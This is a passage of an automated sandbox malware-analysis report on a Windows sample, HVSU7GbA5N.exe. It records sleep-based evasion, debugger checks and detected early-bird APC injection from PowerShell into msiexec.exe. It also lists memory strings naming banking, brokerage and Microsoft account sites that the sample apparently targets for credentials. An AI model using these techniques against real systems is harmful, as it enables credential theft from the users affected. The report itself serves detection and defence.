          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -596047s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -595937s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -595828s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -595719s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -595609s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -595500s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -595391s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -595281s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -595171s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -595062s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -594953s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -594844s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -594734s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -594625s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeCode function: 0_2_00405EC1 FindFirstFileA,FindClose,0_2_00405EC1
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeCode function: 0_2_00402645 FindFirstFileA,0_2_00402645
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeCode function: 0_2_0040547D GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040547D
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599875Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599766Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599656Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599547Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599437Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599327Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599219Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599109Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599000Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598891Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598781Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598672Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598562Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598453Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598344Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598234Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598125Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598016Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597906Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597797Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597687Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597578Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597469Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597359Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597250Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597141Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597031Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596922Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596813Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596703Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596594Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596484Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596375Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596266Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596156Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596047Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595937Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595828Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595719Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595609Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595500Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595391Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595281Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595171Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595062Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594953Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594844Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594734Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594625Jump to behavior
          Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
          Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
          Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
          Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
          Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
          Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
          Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
          Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
          Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
          Source: msiexec.exe, 00000009.00000002.2653650551.00000000075D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2653650551.000000000757A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
          Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
          Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
          Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
          Source: ModuleAnalysisCache.2.drBinary or memory string: Get-NetEventVmNetworkAdapter
          Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
          Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
          Source: powershell.exe, 00000002.00000002.2012024518.0000000005CC6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter@\
          Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
          Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
          Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
          Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
          Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
          Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
          Source: msiexec.exe, 00000009.00000002.2653650551.00000000075D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW}
          Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
          Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
          Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
          Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
          Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
          Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
          Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
          Source: ModuleAnalysisCache.2.drBinary or memory string: Remove-NetEventVmNetworkAdapter
          Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
          Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
          Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
          Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
          Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
          Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
          Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
          Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
          Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
          Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
          Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
          Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
          Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
          Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
          Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
          Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
          Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
          Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
          Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
          Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
          Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
          Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
          Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
          Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
          Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
          Source: powershell.exe, 00000002.00000002.2012024518.0000000005CC6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter@\
          Source: ModuleAnalysisCache.2.drBinary or memory string: Add-NetEventVmNetworkAdapter
          Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
          Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
          Source: powershell.exe, 00000002.00000002.2012024518.0000000005CC6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter@\
          Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
          Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
          Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
          Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
          Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
          Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
          Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeAPI call chain: ExitProcess graph end nodegraph_0-3268
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeAPI call chain: ExitProcess graph end nodegraph_0-3273
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04DC77F9 LdrInitializeThunk,2_2_04DC77F9
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeCode function: 0_2_00405EE8 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405EE8
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Early bird code injection technique detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
          Writes to foreign memory regions
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 4260000Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
